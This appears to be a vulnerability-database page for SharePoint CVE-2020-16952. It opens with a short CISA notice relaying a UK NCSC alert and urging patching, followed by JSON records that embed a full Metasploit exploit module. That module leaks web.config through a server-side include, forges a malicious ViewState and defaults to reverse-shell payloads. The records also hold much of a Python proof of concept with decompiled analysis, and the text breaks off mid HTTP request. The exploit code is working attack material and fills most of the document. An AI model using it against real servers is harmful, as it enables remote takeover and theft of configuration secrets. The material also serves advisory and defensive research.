Description
The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an [Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations >) to address a vulnerability—CVE-2020-16952—affecting Microsoft SharePoint server. An attacker could exploit this vulnerability to take control of an affected system. Applying patches from Microsoft’s October 2020 Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) can prevent exploitation of this vulnerability.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the [NCSC Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) and the Microsoft Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) for more information.
This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.
**Please share your thoughts.**
We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability>); we'd welcome your feedback.
Related
{"id": "CISA:48962A3B37B032DCF622B3E3135B8A1A", "type": "cisa", "bulletinFamily": "info", "title": "NCSC Releases Alert on Microsoft SharePoint Vulnerability", "description": "The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an [Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations >) to address a vulnerability\u2014CVE-2020-16952\u2014affecting Microsoft SharePoint server. An attacker could exploit this vulnerability to take control of an affected system. Applying patches from Microsoft\u2019s October 2020 Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) can prevent exploitation of this vulnerability.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the [NCSC Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) and the Microsoft Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability>); we'd welcome your feedback.\n", "published": "2020-10-16T00:00:00", "modified": "2020-10-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability", "reporter": "CISA", "references": ["https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952", "https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952"], "cvelist": ["CVE-2020-16952"], "lastseen": "2021-02-24T18:06:35", "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1043"]}, {"type": "cve", "idList": ["CVE-2020-16951", "CVE-2020-16952"]}, {"type": "kaspersky", "idList": ["KLA11976"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_SSI_VIEWSTATE-"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16952"]}, {"type": "mskb", "idList": ["KB4486676", "KB4486677", "KB4486694"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "WEB_APPLICATION_SCANNING_112737", "WEB_APPLICATION_SCANNING_112738", "WEB_APPLICATION_SCANNING_112739", "WEB_APPLICATION_SCANNING_112740"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "srcincite", "idList": ["SRC-2020-0022"]}, {"type": "threatpost", "idList": ["THREATPOST:779B904F971138531725D1E57FDFF9DD"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071"]}]}, "score": {"value": 1.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1043"]}, {"type": "cve", "idList": ["CVE-2020-16952"]}, {"type": "ics", "idList": ["ICSA-20-282-02"]}, {"type": "kaspersky", "idList": ["KLA11976"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16952"]}, {"type": "mskb", "idList": ["KB4486676"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB"]}, {"type": "srcincite", "idList": ["SRC-2020-0022"]}, {"type": "threatpost", "idList": ["THREATPOST:779B904F971138531725D1E57FDFF9DD"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-16952", "epss": "0.120790000", "percentile": "0.944340000", "modified": "2023-03-16"}], "vulnersScore": 1.9}, "wildExploited": true, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "edition": 2, "scheme": null, "_state": {"wildexploited": 1647356733, "dependencies": 1660004461, "score": 1684005285, "epss": 1679050336}, "_internal": {"wildexploited_cvelist": ["CVE-2020-16952"], "score_hash": "891a0fddbacf54d1836327feff351cc5"}}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:01", "description": "A remote code execution vulnerability exists in Microsoft SharePoint. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-20T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft SharePoint Remote Code Execution (CVE-2020-16952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-11-28T00:00:00", "id": "CPAI-2020-1043", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-19T16:33:40", "description": "", "cvss3": {}, "published": "2020-10-19T00:00:00", "type": "packetstorm", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "PACKETSTORM:159612", "href": "https://packetstormsecurity.com/files/159612/Microsoft-SharePoint-SSI-ViewState-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE', \n'Description' => %q{ \nThis module exploits a server-side include (SSI) in SharePoint to leak \nthe web.config file and forge a malicious ViewState with the extracted \nvalidation key. \n \nThis exploit is authenticated and requires a user with page creation \nprivileges, which is a standard permission in SharePoint. \n \nThe web.config file will be stored in loot once retrieved, and the \nVALIDATION_KEY option can be set to short-circuit the SSI and trigger \nthe ViewState deserialization. \n \nTested against SharePoint 2019 on Windows Server 2016. \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16952'], \n['URL', 'https://srcincite.io/advisories/src-2020-0022/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952'] \n], \n'DisclosureDate' => '2020-10-13', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'DotNetGadgetChain' => :TypeConfuseDelegate \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('VALIDATION_KEY', [false, 'ViewState validation key']), \n# \"Promote\" these advanced options so we don't have to pass around our own \nOptString.new('HttpUsername', [false, 'SharePoint username']), \nOptString.new('HttpPassword', [false, 'SharePoint password']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef vuln_builds \n[ \n[Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013 \n[Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016 \n[Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019 \n] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Hat tip @tsellers-r7 \n# \n# MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly \nunless (build_header = res.headers['MicrosoftSharePointTeamServices']) \nreturn CheckCode::Unknown('Target does not appear to be running SharePoint.') \nend \n \nunless (build = build_header.scan(/^([\\d.]+):/).flatten.first) \nreturn CheckCode::Detected('Target did not respond with SharePoint build.') \nend \n \nif vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\") \nend \n \ndef exploit \nunless username && password \nfail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation') \nend \n \nif (@validation_key = datastore['VALIDATION_KEY']) \nprint_status(\"Using ViewState validation key #{@validation_key}\") \nelse \ncreate_ssi_page \nleak_web_config \nend \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef create_ssi_page \nprint_status(\"Creating page for SSI: #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'PUT', \n'uri' => ssi_path, \n'data' => ssi_page \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless [200, 201].include?(res.code) \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\") \nend \n \nfail_with(Failure::NotFound, 'Failed to create page') \nend \n \nprint_good('Successfully created page') \n@page_created = true \nend \n \ndef leak_web_config \nprint_status('Leaking web.config') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => ssi_path, \n'headers' => { \nssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\") \nend \n \nunless (web_config = res.get_xml_document.at('//configuration')) \nfail_with(Failure::NotFound, 'Failed to extract web.config from response') \nend \n \nprint_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\") \n \nunless (@validation_key = extract_viewstate_validation_key(web_config)) \nfail_with(Failure::NotFound, 'Failed to extract ViewState validation key') \nend \n \nprint_good(\"ViewState validation key: #{@validation_key}\") \nensure \ndelete_ssi_page if @page_created \nend \n \ndef delete_ssi_page \nprint_status(\"Deleting #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'DELETE', \n'uri' => ssi_path, \n'partial' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 204 \nprint_warning('Failed to delete page') \nreturn \nend \n \nprint_good('Successfully deleted page') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'), \n'vars_post' => { \n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx \nalgo: 'sha256', \nkey: pack_viewstate_validation_key(@validation_key) \n) \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good('Successfully executed command') \nend \n \ndef ssi_page \n<<~XML \n<WebPartPages:DataFormWebPart runat=\"server\"> \n<ParameterBindings> \n<ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" /> \n</ParameterBindings> \n<xsl> \n<xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"> \n<xsl:param name=\"#{ssi_param}\" /> \n<xsl:template match=\"/\"> \n<xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" /> \n</xsl:template> \n</xsl:stylesheet> \n</xsl> \n</WebPartPages:DataFormWebPart> \nXML \nend \n \ndef ssi_path \n@ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\") \nend \n \ndef ssi_header \n@ssi_header ||= rand_text_alphanumeric(8..42) \nend \n \ndef ssi_param \n@ssi_param ||= rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/159612/sharepoint_ssi_viewstate.rb.txt"}], "srcincite": [{"lastseen": "2023-06-06T16:26:20", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of SharePoint Server. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the DataFormWebPart class. The issue results from the lack of proper validation of user-supplied data which can result in a server side include. An attacker can leverage this vulnerability to execute code in the context of the local Administrator.\n\n**Affected Vendors:**\n\nMicrosoft\n\n**Affected Products:**\n\nSharePoint Server\n\n**Vendor Response:**\n\nMicrosoft has issued an update to correct this vulnerability. More details can be found at: <https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "srcincite", "title": "SRC-2020-0022 : Microsoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "id": "SRC-2020-0022", "href": "https://srcincite.io/advisories/src-2020-0022/", "sourceData": "#!/usr/bin/python3\r\n\"\"\"\r\nMicrosoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability\r\nPatch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952\r\n\r\n## Summary:\r\n\r\nAn authenticated attacker can craft pages to trigger a server-side include that can be leveraged to leak the web.config file. The attacker can leverage this to achieve remote code execution.\r\n\r\n## Notes:\r\n\r\n- this does not require the use of a SharePoint endpoint such as WebPartPagesWebService\r\n- the attacker needs AddAndCustomizePages permission enabled which is the default\r\n- you will need to compile and store ysoserial.net in the same folder as this exploit\r\n\r\n## Vulnerability Analysis:\r\n\r\nInside of the Microsoft.SharePoint.WebPartPages.DataFormWebPart we can observe the `CreateChildControls`\r\n\r\n```c#\r\nnamespace Microsoft.SharePoint.WebPartPages\r\n{\r\n [XmlRoot(Namespace = \"http://schemas.microsoft.com/WebPart/v2/DataView\")]\r\n [ParseChildren(true)]\r\n [Designer(typeof(DataFormWebPartDesigner))]\r\n [SupportsAttributeMarkup(true)]\r\n [AspNetHostingPermission(SecurityAction.LinkDemand, Level = AspNetHostingPermissionLevel.Minimal)]\r\n [SharePointPermission(SecurityAction.LinkDemand, ObjectModel = true)]\r\n [AspNetHostingPermission(SecurityAction.InheritanceDemand, Level = AspNetHostingPermissionLevel.Minimal)]\r\n [SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)]\r\n public class DataFormWebPart : BaseXsltDataWebPart, IDesignTimeHtmlProvider, IPostBackEventHandler, IWebPartRow, ICallbackEventHandler, IConnectionData, IListWebPart\r\n {\r\n \r\n // ...\r\n [SharePointPermission(SecurityAction.Demand, ObjectModel = true)]\r\n protected override void CreateChildControls()\r\n {\r\n if (!this.Visible)\r\n {\r\n return;\r\n }\r\n if (!this.AreAllConsumerInterfacesFulfilled())\r\n {\r\n this._deferredXSLTBecauseOfConnections = true;\r\n return;\r\n }\r\n if ((base.DesignMode && this.AllowXSLTEditing) || this._forAJAXDropDown)\r\n {\r\n return;\r\n }\r\n if (this.IsMondoCAMLWebPart() && !base.DesignMode && !string.IsNullOrEmpty(this.ListName) && !this.IsForm)\r\n {\r\n SPContext context = SPContext.GetContext(this.Context, base.StorageKey, new Guid(this.ListName), this.CurrentWeb);\r\n if (context != null)\r\n {\r\n SPViewContext viewContext = context.ViewContext;\r\n if (this is BaseXsltListWebPart)\r\n {\r\n BaseXsltListWebPart baseXsltListWebPart = this as BaseXsltListWebPart;\r\n if (baseXsltListWebPart.view != null)\r\n {\r\n viewContext.View = baseXsltListWebPart.view;\r\n }\r\n }\r\n if (viewContext != null && base.RenderMode != RenderMode.Design && base.RenderMode != RenderMode.Preview)\r\n {\r\n viewContext.RedirectIfNecessary();\r\n }\r\n }\r\n }\r\n base.CreateChildControls();\r\n this.AddDataSourceControls();\r\n UpdatePanel updatePanel = null;\r\n if (this.AsyncRefresh)\r\n {\r\n this.CreateAsyncPostBackControls(ref updatePanel);\r\n this.AddAutoRefreshTimer(updatePanel);\r\n }\r\n if (base.DesignMode || !this.InitialAsyncDataFetch || this.Page == null || this.Page.IsCallback)\r\n {\r\n this.EnsureDataBound(); // 1\r\n }\r\n else\r\n {\r\n this._asyncDelayed = true;\r\n if (this.SPList != null && this.SPList.HasExternalDataSource)\r\n {\r\n this.deferXsltTransform = false;\r\n this.EnsureDataBound();\r\n }\r\n string text = Utility.MakeLayoutsRootServerRelative(\"images/gears_an.gif\");\r\n string @string = WebPartPageResource.GetString(\"DataFormWebPartRefreshing\");\r\n this._partContent = this._partContent + \"\";\r\n string partContent = this._partContent;\r\n this._partContent = string.Concat(new string[]\r\n {\r\n partContent,\r\n \"\"\r\n });\r\n this._partContent += \"\";\r\n }\r\n this.EditMode = false;\r\n if (this._partContent != null)\r\n {\r\n if (this.IsForm && this.DataSource is SPDataSource && base.PageComponent != null && this.ItemContext != null)\r\n {\r\n this.ItemContext.CurrentPageComponent = base.PageComponent;\r\n }\r\n bool flag = this.view != null && base.PageComponent != null;\r\n if ((this.IsGhosted || flag) && !this.UseSchemaXmlToolbar && this.ToolbarControl != null)\r\n {\r\n if (base.PageComponent != null)\r\n {\r\n this.ToolbarControl.RenderContext.CurrentPageComponent = base.PageComponent;\r\n }\r\n if ((this.view == null || !this.view.IsGroupRender) && (!this._asyncDelayed || flag))\r\n {\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(this.ToolbarControl);\r\n }\r\n else\r\n {\r\n this.Controls.Add(this.ToolbarControl);\r\n }\r\n }\r\n }\r\n else\r\n {\r\n this.CanHaveServerControls = true;\r\n }\r\n if (this.CanHaveServerControls && DataFormWebPart.RunatChecker.IsMatch(this._partContent)) // 2\r\n {\r\n if (this._assemblyReferences != null && this._partContent != null)\r\n {\r\n StringBuilder stringBuilder = new StringBuilder();\r\n for (int i = 0; i < this._assemblyReferences.Length; i++)\r\n {\r\n stringBuilder.Append(this._assemblyReferences[i]);\r\n }\r\n stringBuilder.Append(this._partContent);\r\n this._partContent = stringBuilder.ToString();\r\n }\r\n if (base.Web != null)\r\n {\r\n EditingPageParser.VerifyControlOnSafeList(this._partContent, null, base.Web, false); // 3\r\n }\r\n if (this.Page.AppRelativeVirtualPath == null)\r\n {\r\n this.Page.AppRelativeVirtualPath = \"~/current.aspx\";\r\n }\r\n bool flag2 = EditingPageParser.VerifySPDControlMarkup(this._partContent);\r\n if (flag2)\r\n {\r\n ULS.SendTraceTag(595161362U, ULSCat.msoulscat_WSS_WebParts, ULSTraceLevel.Medium, \"Allow DFWP XSL markup {0} to be parsed without parserFilter.\", new object[]\r\n {\r\n this._partContent\r\n });\r\n }\r\n Control control = this.Page.ParseControl(this._partContent, flag2); // 4\r\n SPDataSource spdataSource = this.DataSource as SPDataSource;\r\n bool flag3 = false;\r\n if (this.view != null && !string.IsNullOrEmpty(this.view.InlineEdit))\r\n {\r\n flag3 = this.view.InlineEdit.Equals(\"true\", StringComparison.OrdinalIgnoreCase);\r\n }\r\n SPContext spcontext = null;\r\n if (spdataSource != null && base.Web != null && (spdataSource.DataSourceMode == SPDataSourceMode.ListItem || (spdataSource.DataSourceMode == SPDataSourceMode.List && flag3)))\r\n {\r\n string text3;\r\n if (spdataSource.DataSourceMode == SPDataSourceMode.List)\r\n {\r\n string text2 = (string)this.ParameterValues.Collection[\"dvt_form_key\"];\r\n text3 = text2;\r\n }\r\n else\r\n {\r\n text3 = spdataSource.ListItemID.ToString(CultureInfo.InvariantCulture);\r\n }\r\n if (text3 != null)\r\n {\r\n if (this.FormContexts.ContainsKey(text3))\r\n {\r\n spcontext = this.FormContexts[text3];\r\n }\r\n else\r\n {\r\n spcontext = SPContext.GetContext(this.Context, text3, ((IListWebPart)this).ListId, this.CurrentWeb);\r\n this.FormContexts[text3] = spcontext;\r\n }\r\n }\r\n }\r\n foreach (object obj in control.Controls)\r\n {\r\n Control control2 = (Control)obj;\r\n this.RecursivelyAddFormFieldContext(control2, spcontext);\r\n }\r\n if (spcontext != null && spdataSource != null)\r\n {\r\n spdataSource.ItemContext = spcontext;\r\n }\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(control); // 5\r\n }\r\n else\r\n {\r\n this.AddParsedSubObject(control);\r\n }\r\n using (IEnumerator enumerator2 = control.Controls.GetEnumerator())\r\n {\r\n while (enumerator2.MoveNext())\r\n {\r\n object obj2 = enumerator2.Current;\r\n Control control3 = (Control)obj2;\r\n this.RecursivelyProcessChildFormControls(control3);\r\n }\r\n goto IL_632;\r\n }\r\n }\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n if (this._listView != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(this._listView);\r\n }\r\n else\r\n {\r\n Literal literal = new Literal();\r\n literal.Text = this._partContent;\r\n updatePanel.ContentTemplateContainer.Controls.Add(literal);\r\n }\r\n }\r\n else if (this._listView != null)\r\n {\r\n this.AddParsedSubObject(this._listView);\r\n }\r\n else\r\n {\r\n this.AddParsedSubObject(new Literal\r\n {\r\n Text = this._partContent\r\n });\r\n }\r\n IL_632:\r\n this.RemoveViewStateIfEmpty(\"ParamValues\");\r\n this.RemoveViewStateIfEmpty(\"FilterOperations\");\r\n this.RemoveViewStateIfEmpty(\"IntermediateFormActions\");\r\n this.RemoveViewStateIfEmpty(\"OriginalValues\");\r\n this._partContent = null;\r\n this._listView = null;\r\n }\r\n this._asyncDelayed = false;\r\n }\r\n```\r\n\r\nAt *[1]*, the code performs a databind and accesses the data from the datasource (in this case it's our controlled serverside http header). The data returned must be valid xml so that it can be processed via our crafted xslt. Then at *[2]* the code calls `DataFormWebPart.RunatChecker.IsMatch` on our controlled `_partContent`. This checks for an instance of `runat=server` in the supplied xml. However, we can't put that in there because we can't register any prefixes (registration is probably not possible due to the <% not being a valid xml tag). But I found a way to pass the check by using HTML server controls which can include a `runat=server`.\r\n\r\nAt *[3]* the code calls `VerifyControlOnSafeList` with the false flag, meaning our input can use server-side includes. Lucky for us, includes are valid xml, so we can stuff them into our `_partContent` and later at *[4]* they are parsed and finally added to the page at *[5]*.\r\n\r\nThis allows an us to leak the complete `web.config` file, including the Validation Key which is enough to generate a malicious serialized viewState and trigger rce via deserialization.\r\n\r\n## Fingerprint:\r\n\r\nFor detecting vulnerable versions before exploitation, you can use this:\r\n\r\n```\r\nPUT /poc.aspx HTTP/1.1\r\nHost: 